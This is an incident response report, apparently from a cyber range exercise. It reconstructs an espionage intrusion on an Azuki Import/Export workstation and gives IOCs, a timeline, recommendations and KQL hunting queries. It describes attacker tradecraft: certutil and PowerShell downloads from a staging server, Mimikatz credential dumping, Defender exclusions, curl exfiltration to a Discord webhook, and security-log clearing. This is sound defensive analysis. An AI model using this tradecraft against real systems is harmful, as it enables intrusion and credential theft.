Incident Response Report
Azuki Import/Export
梓貿易株式会社
AZUKI-001  ·  Targeted Intrusion  ·  2025-11-19
ESCALATED TO
Josh — Cyber Range Community
Incident ID
AZUKI-001
Date of Report
February 17, 2026
Severity
HIGH
Report Status
Investigation Complete (Post-Incident Review)
Escalated To
Josh — Cyber Range Community
Analyst
Yousef Nabil
Dwell Time (observed)
~34 min (18:37–19:11 UTC)
01 Executive Summary

Azuki Import/Export (梓貿易株式会社) investigated a targeted intrusion consistent with corporate espionage after a competitor undercut a long-term supplier contract by exactly 3% and supplier contracts/pricing data later appeared on underground forums. The compromise centered on the IT admin workstation azuki-sl during the window 2025-11-19 → 2025-11-20 (UTC), reconstructed using Microsoft Defender for Endpoint telemetry in Microsoft Sentinel across DeviceLogonEvents, DeviceProcessEvents, DeviceRegistryEvents, DeviceNetworkEvents, and DeviceFileEvents.

Telemetry confirmed successful RemoteInteractive (RDP) access to azuki-sl from the external IP 88.97.178.12 using the account kenji.sato. Following access, the threat actor moved quickly into tool transfer and environment preparation. At 18:37 UTC, PowerShell retrieved wupdate.ps1 from 78.141.196.6:8080, followed by additional script retrieval (wupdate.bat) between 18:46–18:49 UTC. During the same phase, Windows Defender posture was intentionally weakened by adding exclusions for .ps1, .bat, and .exe extensions and excluding the user Temp path (C:\Users\KENJI~1.SAT\AppData\Local\Temp) to reduce inspection of attacker tooling and execution artefacts.

With defenses softened, the actor performed interactive reconnaissance (ipconfig /all and arp -a) at 19:03–19:04 UTC, then established a dedicated staging area by hiding C:\ProgramData\WindowsCache at 19:05 UTC using attrib +h +s. Tooling was downloaded via LOLBIN abuse (certutil -urlcache -f) between 19:06–19:07 UTC, writing payloads as svchost.exe and mm.exe. Persistence was added at 19:07 UTC through a scheduled task named "Windows Update Check" executing C:\ProgramData\WindowsCache\svchost.exe daily at 02:00 as SYSTEM. Network telemetry differentiated staging versus C2: :8080 tied to PowerShell/certutil downloads, :443 tied to the staged payload (svchost.exe).

At 19:08 UTC, the actor executed mm.exe with command-line indicators consistent with Mimikatz usage (privilege::debug sekurlsa::logonpasswords) to extract credential material from LSASS. At 19:09 UTC, export-data.zip was exfiltrated from C:\ProgramData\WindowsCache via curl to a Discord webhook. At 19:10 UTC, the actor staged credentials for 10.1.0.188 using cmdkey (fileadmin) then initiated RDP via mstsc. The sequence concluded at 19:11 UTC with wevtutil cl Security.

Impact: Confirmed data exfiltration (export-data.zip), confirmed credential dumping activity (sekurlsa::logonpasswords), persistence established (scheduled task and documented backdoor local account support), Windows Defender exclusions applied, and Security log cleared to degrade forensic visibility.

02 WHO
External IPs
IP AddressRoleLocationASN / OrgType
88.97.178.12Initial access source (RDP)London, England, UKAS51809 — BRSK LimitedDSL / Residential
78.141.196.6Tool staging + C2 serverLondon, England, UKAS20473 — Vultr Holdings LLCHosting (VPS)
Attacker Infrastructure
IndicatorRoleNotes
78.141.196.6:8080Payload/script delivery:8080 correlated with PowerShell/certutil downloads
78.141.196.6:443C2 / beaconing:443 correlated with staged svchost.exe outbound communications
discord.com/api/webhooks/...Exfiltration endpointcurl upload of export-data.zip
Accounts Used
AccountTypeUsage Observed
kenji.satoUser accountSuccessful RDP RemoteInteractive logon from 88.97.178.12
supportLocal backdoorDocumented backdoor local account
fileadminLateral movement targetcmdkey credential staging + mstsc to 10.1.0.188
SYSTEMLocal systemScheduled task execution context
03 WHAT
  • Threat actor accessed azuki-sl via RDP (RemoteInteractive) from 88.97.178.12 using kenji.sato.
  • Threat actor downloaded wupdate.ps1 from http://78.141.196.6:8080/wupdate.ps1 and wrote it into the user Temp path.
  • Threat actor downloaded wupdate.bat from http://78.141.196.6:8080/wupdate.bat and wrote it into the user Temp path.
  • Threat actor added Windows Defender extension exclusions for .bat, .ps1, .exe via Defender exclusion registry paths.
  • Threat actor added a Windows Defender path exclusion for C:\Users\KENJI~1.SAT\AppData\Local\Temp.
  • Threat actor performed interactive reconnaissance using ipconfig /all and arp -a.
  • Threat actor created and concealed a staging directory by applying attrib +h +s to C:\ProgramData\WindowsCache.
  • Threat actor abused certutil.exe -urlcache -f to download payloads into the staging directory, writing svchost.exe and mm.exe.
  • Threat actor created persistence via scheduled task "Windows Update Check" executing C:\ProgramData\WindowsCache\svchost.exe daily at 02:00 as SYSTEM.
  • Threat actor established external communications, using :8080 for transfer and :443 for payload communications to 78.141.196.6.
  • Threat actor executed credential dumping commands via mm.exe using privilege::debug and sekurlsa::logonpasswords.
  • Threat actor staged and exfiltrated C:\ProgramData\WindowsCache\export-data.zip using curl to https://discord.com/api/webhooks/....
  • Threat actor attempted lateral movement by storing credentials for 10.1.0.188 with cmdkey (user fileadmin) and initiating RDP via mstsc.exe /v:10.1.0.188.
  • Threat actor cleared the Windows Security event log using wevtutil.exe cl Security.
04 WHEN

Timeline (UTC; reconstructed from Defender telemetry using the queries in the KQL Queries section):

18:37PowerShell downloaded wupdate.ps1 from 78.141.196.6:8080
18:46 – 18:49Additional script download (wupdate.bat) and Windows Defender exclusions added
19:03 – 19:04Interactive reconnaissance: ipconfig /all, arp -a
19:05Staging directory hidden: attrib +h +s C:\ProgramData\WindowsCache
19:06 – 19:07Payload downloads via certutil into staging (svchost.exe, mm.exe)
19:07Persistence: scheduled task Windows Update Check → svchost.exe (SYSTEM, daily 02:00)
19:08Credential dumping: mm.exe privilege::debug sekurlsa::logonpasswords exit
19:09Exfiltration: curl uploaded export-data.zip to Discord webhook
19:10Lateral movement attempt: cmdkey + mstsc to 10.1.0.188 (user fileadmin)
19:11Anti-forensics: wevtutil cl Security

Observed dwell time: ~34 minutes (18:37–19:11 UTC).

05 WHERE
Targets
Host / IPRole
azuki-slPrimary compromised IT admin workstation
10.1.0.188Lateral movement attempt target (cmdkey + mstsc)
Malware / Tool Paths (as observed)
  • C:\ProgramData\WindowsCache (hidden staging directory)
  • C:\ProgramData\WindowsCache\svchost.exe (staged payload + persisted task target)
  • C:\ProgramData\WindowsCache\mm.exe (credential dumping tool)
  • C:\ProgramData\WindowsCache\export-data.zip (exfiltrated archive)
  • C:\Users\KENJI~1.SAT\AppData\Local\Temp (Defender excluded path)
  • C:\Users...\Temp\wupdate.ps1 (download destination shown in command line)
  • C:\Users...\Temp\wupdate.bat (download destination shown in command line)
Network Connections (as observed)
  • RDP Initial Access: 88.97.178.12 → azuki-sl (RemoteInteractive), account kenji.sato
  • Tool Transfer: azuki-sl → 78.141.196.6:8080 (PowerShell + certutil)
  • C2/Beaconing: azuki-sl → 78.141.196.6:443 (initiating process svchost.exe)
  • Exfiltration: azuki-sl → https://discord.com/api/webhooks/... (curl upload of export-data.zip)
  • Lateral Attempt: azuki-sl → 10.1.0.188 (cmdkey credential staging + mstsc)
06 WHY
Root Cause (evidence-based)
  • Valid credentials were used for interactive remote access (successful RDP RemoteInteractive logon as kenji.sato from an external IP).
  • The threat actor executed with sufficient rights to apply Windows Defender exclusions (extensions and path exclusions recorded under Defender exclusion registry locations).
  • The workstation allowed living-off-the-land transfer and execution patterns (PowerShell downloads, certutil -urlcache, scheduled task creation, and event log clearing) without prevention in the observed window.
  • Anti-forensic activity (Security log clearing) reduced visibility into authentication and privileged actions during the incident.
Attacker Goal

Steal sensitive business data (supplier contracts and pricing) and exfiltrate it off-network for competitive advantage.

07 HOW
Initial Access
  • Successful RDP (RemoteInteractive) access gained to azuki-sl using legitimate account kenji.sato from external IP 88.97.178.12.
Tooling Delivery
  • PowerShell used to retrieve wupdate.ps1 from external server 78.141.196.6 at 18:37 UTC.
  • PowerShell used to retrieve wupdate.bat from 78.141.196.6 between 18:46–18:49 UTC.
Defense Evasion
  • Windows Defender exclusions added for executable/script extensions: .ps1, .bat, .exe.
  • Windows Defender path exclusion added for C:\Users\KENJI~1.SAT\AppData\Local\Temp to support drop-and-run activity.
Discovery
  • Host and network reconnaissance executed using ipconfig /all at 19:03–19:04 UTC.
  • Neighbour/network discovery executed using arp -a at 19:03–19:04 UTC.
Staging
  • Staging directory created at C:\ProgramData\WindowsCache and concealed using attrib +h +s at 19:05 UTC.
  • LOLBIN certutil.exe -urlcache -f used to download payloads from 78.141.196.6:8080.
  • Staged executables written to disk as C:\ProgramData\WindowsCache\svchost.exe.
  • Staged executables written to disk as C:\ProgramData\WindowsCache\mm.exe.
  • Masquerading observed: a server-hosted filename (e.g., AdobeGC.exe) saved locally as mm.exe.
Persistence
  • Scheduled task created at 19:07 UTC named "Windows Update Check".
  • Task configured to execute C:\ProgramData\WindowsCache\svchost.exe daily at 02:00 as SYSTEM.
  • Persistence naming and execution context aligned with stealth: "Windows Update" theme + svchost.exe masquerade + non-standard ProgramData path.
Command-and-Control
  • Outbound activity to 78.141.196.6:8080 associated with payload/script transfer (PowerShell/certutil).
  • Outbound activity to 78.141.196.6:443 initiated by staged svchost.exe, consistent with C2-style communications to the same infrastructure.
Credential Access
  • Credential dumping executed at 19:08 UTC via mm.exe using: privilege::debug sekurlsa::logonpasswords exit.
  • Activity consistent with LSASS credential harvesting tradecraft (credential material exposure risk).
Collection and Exfiltration
  • Archive staged as export-data.zip within C:\ProgramData\WindowsCache.
  • Exfiltration executed at 19:09 UTC using curl to a Discord webhook endpoint: discord.com/api/webhooks/...
Lateral Movement Attempt
  • Credentials staged for internal target 10.1.0.188 using cmdkey with username fileadmin at 19:10 UTC.
  • RDP pivot attempt initiated using mstsc.exe /v:10.1.0.188 at 19:10 UTC.
Anti-Forensics
  • Windows Security event log cleared at 19:11 UTC using wevtutil.exe cl Security to reduce authentication and privilege-tracking visibility.
08 IMPACT
ConfirmedData theft occurred: export-data.zip was uploaded off-network via curl to https://discord.com/api/webhooks/....
ConfirmedCredential exposure occurred: mm.exe executed sekurlsa::logonpasswords, indicating LSASS credential dumping activity.
ConfirmedPersistence occurred: scheduled task "Windows Update Check" running C:\ProgramData\WindowsCache\svchost.exe as SYSTEM (daily at 02:00) and a documented backdoor local account name support.
ConfirmedSecurity control degradation occurred: Windows Defender exclusions were added for .ps1, .bat, .exe and C:\Users\KENJI~1.SAT\AppData\Local\Temp.
ConfirmedForensic visibility was degraded: Windows Security log was cleared.
Risk: HIGHThe combination of confirmed exfiltration, credential dumping, persistence, and log clearing creates material risk of follow-on access, reuse of exposed credentials, and broader compromise beyond the initially observed workstation and the attempted lateral target.
09 THREAT INTELLIGENCE

88.97.178.12 (Initial Access Source) — OSINT enrichment identified this IP as located in London, England, United Kingdom, associated with AS51809 (BRSK Limited) and characterised as DSL access. The residential nature of the source is consistent with interactive access paths such as stolen credentials used directly from consumer connectivity, rather than a dedicated cloud/VPS host typically seen for malware staging.

78.141.196.6 (Staging + C2 Server) — OSINT enrichment identified this IP as located in London, England, United Kingdom, with hostname 78.141.196.6.vultrusercontent.com, and associated with AS20473 (The Constant Company, LLC / Vultr Holdings LLC). The hosting classification supports its role as attacker-controlled infrastructure used for both payload delivery and C2. Telemetry showed clear role separation by port and initiating process: :8080 correlated directly with download utilities (powershell.exe, certutil.exe); :443 correlated with the staged payload (svchost.exe) communicating outbound, consistent with C2/beacon behaviour designed to blend into common HTTPS traffic.

Tools and Tradecraft Observed (host-based)
  • PowerShell (Invoke-WebRequest) for initial script transfer (wupdate.ps1, wupdate.bat) from an external server.
  • certutil.exe -urlcache -f for LOLBIN payload transfer into a hidden ProgramData staging directory.
  • schtasks.exe for persistence via a disguised scheduled task (Windows Update Check) running a staged payload as SYSTEM.
  • mm.exe executing privilege::debug and sekurlsa::logonpasswords, consistent with credential dumping activity.
  • curl.exe for outbound file upload/exfiltration of export-data.zip to a Discord webhook endpoint.
  • cmdkey.exe + mstsc.exe for credential staging and lateral movement attempt to 10.1.0.188 using fileadmin.
  • wevtutil.exe cl Security for anti-forensics (Security log clearing).
Malware / Payload Observations (based on paths + behaviour)
  • svchost.exe executing from C:\ProgramData\WindowsCache is inconsistent with legitimate Windows process placement and was used as the scheduled task payload and the process initiating :443 communications to the external infrastructure.
  • mm.exe served as the credential dumping tool, including evidence of masquerading at download time (server-hosted filename AdobeGC.exe saved to disk as mm.exe).
  • wupdate.ps1 / wupdate.bat functioned as staging enablers, preceding Defender exclusions, tool transfer, and persistence.
10 RECOMMENDATIONS
Immediate
  • Isolate azuki-sl from the network to prevent continued C2, exfiltration, or lateral movement attempts.
  • Disable/reset kenji.sato credentials immediately and treat all credentials used on azuki-sl as exposed due to confirmed LSASS dumping activity.
  • Remove persistence on azuki-sl: delete scheduled task "Windows Update Check"; remove/disable the backdoor local account support (and validate no other local admin accounts were created).
  • Contain attacker infrastructure: block 78.141.196.6 at perimeter controls and hunt enterprise-wide for any communication attempts to this IP over :8080 and :443.
  • Preserve volatile and on-disk artefacts before cleanup: collect the full contents of C:\ProgramData\WindowsCache and export relevant Sentinel/MDE logs for chain-of-custody where applicable.
Short-Term (24–48 Hours)
  • Scope lateral movement risk: prioritise investigation of 10.1.0.188 for logons, new processes, scheduled tasks, Defender setting changes, and any evidence of credential reuse from azuki-sl.
  • Hunt for the same tradecraft across endpoints, specifically: Defender exclusion registry changes (Extensions and Paths); certutil -urlcache -f http usage; scheduled tasks executing binaries from ProgramData staging paths; wevtutil cl Security or other event log clearing behaviour.
  • Review network egress and proxy telemetry for Discord webhook patterns and identify whether similar webhook uploads occurred from other hosts.
  • Validate Defender posture on impacted systems: remove malicious exclusions and confirm protections are restored for scripts/executables and Temp paths.
Long-Term (1–4 Weeks)
  • Reduce RDP exposure and credential replay risk: restrict RemoteInteractive access paths to only approved sources and enforce stronger authentication controls for remote access.
  • Harden endpoint controls against LOLBIN transfer and disguised persistence: establish detections/blocks for suspicious certutil download patterns, scheduled tasks running from non-standard directories, and svchost-named binaries executing outside System32.
  • Implement durable monitoring for credential dumping: alert on command-line indicators like sekurlsa::logonpasswords and suspicious debug privilege enabling where feasible.
  • Improve anti-forensics visibility: implement monitoring and alerting for event log clearing and correlate with remote logons, task creation, and outbound connections.
  • Data protection governance: review and strengthen controls around storage/handling of supplier contracts and pricing artefacts to reduce blast radius if a single workstation is compromised.
11 LESSONS LEARNED
  • A "quiet" business anomaly can be the first meaningful indicator of a targeted intrusion and data theft.
  • Defender exclusions for scripts/executables and Temp directories directly enable rapid tool execution and should be treated as high-signal events.
  • A hidden ProgramData staging directory combined with masqueraded filenames ("svchost.exe", "mm.exe") is strong evidence of deliberate tradecraft rather than accidental software behaviour.
  • Credential dumping marks a pivot point from single-host compromise to assumed credential exposure across the environment.
  • Clearing the Security event log is a decisive anti-forensic action that should immediately elevate incident priority and scoping urgency.
  • Separating "tool transfer" traffic from "beacon/C2" traffic by port and initiating process prevents misclassification of attacker infrastructure roles.
12 KQL QUERIES
Q01 — Successful RemoteInteractive logons (Initial Access Source IP + Account)
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ActionType == "LogonSuccess"
| summarize count() by RemoteIP, AccountName
Q02 — Pivot on the attacker source IP (session validation)
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RemoteIP == "88.97.178.12"
| project TimeGenerated, DeviceName, AccountName, LogonType, ActionType, RemoteIP, IsLocalAdmin, InitiatingProcessFileName
| order by TimeGenerated asc
Q03 — Recon commands executed (ipconfig / arp)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("ipconfig", "arp -a")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine
| order by TimeGenerated asc
Q04 — Staging directory hiding (attrib +h +s)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has "attrib"
| project TimeGenerated, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q05 — Defender extension exclusions (count + values)
KQL
DeviceRegistryEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where RegistryKey has @"Windows Defender\Exclusions\Extensions"
| where ActionType == "RegistryValueSet"
| summarize Extensions=make_set(RegistryValueName), Count=dcount(RegistryValueName)
Q06 — Defender path exclusions (exact excluded path)
KQL
DeviceRegistryEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where RegistryKey has @"Windows Defender\Exclusions\Paths"
| where ActionType == "RegistryValueSet"
| project TimeGenerated, RegistryValueName
| order by TimeGenerated asc
Q07 — HTTP-related process command lines (PowerShell + certutil)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has "http"
| project TimeGenerated, FileName, ProcessCommandLine
| order by TimeGenerated asc
Q08 — Scheduled task creation (persistence)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("schtasks", "/create")
| project TimeGenerated, ProcessCommandLine
Q09 — Local user creation / backdoor account
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("/add", "net user", "local group")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine
| order by TimeGenerated asc
Q10 — Connections to external server (staging vs C2 port separation)
KQL
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where RemoteIP == "78.141.196.6"
| project TimeGenerated, InitiatingProcessFileName, RemoteIP, RemotePort
| order by TimeGenerated asc
Q11 — Credential dumping indicators (mimikatz / sekurlsa)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("sekurlsa::logonpasswords", "privilege::debug", "mimikatz")
| project TimeGenerated, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q12 — Staging directory file activity (create/rename evidence)
KQL
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where FolderPath startswith @"C:\ProgramData\WindowsCache\"
| where ActionType in ("FileCreated","FileRenamed")
| project TimeGenerated, ActionType, FolderPath, FileName, PreviousFileName, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q13 — Exfiltration + RDP tooling (curl / cmdkey / mstsc)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("mstsc", "cmdkey")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, DeviceName
Q14 — Security log clearing (anti-forensics)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("wevtutil", "cl")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, DeviceName
| order by TimeGenerated asc
CONFIDENTIAL Azuki Import/Export — Targeted Intrusion  ·  Yousef Nabil  ·  February 17, 2026